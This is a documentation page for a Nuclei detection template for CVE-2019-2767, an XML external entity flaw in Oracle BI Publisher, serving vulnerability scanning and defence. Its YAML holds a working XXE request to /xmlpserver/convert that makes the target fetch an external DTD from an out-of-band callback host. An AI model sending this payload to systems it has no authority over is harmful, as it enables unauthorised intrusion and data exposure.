Skip to content
Nuclei Templates

Oracle Business Intelligence Publisher - XML External Entity Injection

ID: CVE-2019-2767

Severity: high

Author: madrobot

Tags: cve,cve2019,edb,oracle,xxe,oast

Description

Section titled “Description”

Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.

YAML Source

Section titled “YAML Source”
id: CVE-2019-2767


info:
  name: Oracle Business Intelligence Publisher - XML External Entity Injection
  author: madrobot
  severity: high
  description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system.
  remediation: |
    Apply the latest security patches provided by Oracle to fix this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/46729
    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/vah13/Oracle-BI-bugs
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2019-2767
    epss-score: 0.14972
    epss-percentile: 0.95807
    cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: bi_publisher
  tags: cve,cve2019,edb,oracle,xxe,oast


http:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022036b98ae5264dd3c23d983641aba59ad19f9ce91e5e318fcd5139e623d37b8c6d022100cf48ce31c5f7fb2e04d8db1fe69f9f4014f7decac76729db81994237ee5715d5:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-2767.yaml"

View on Github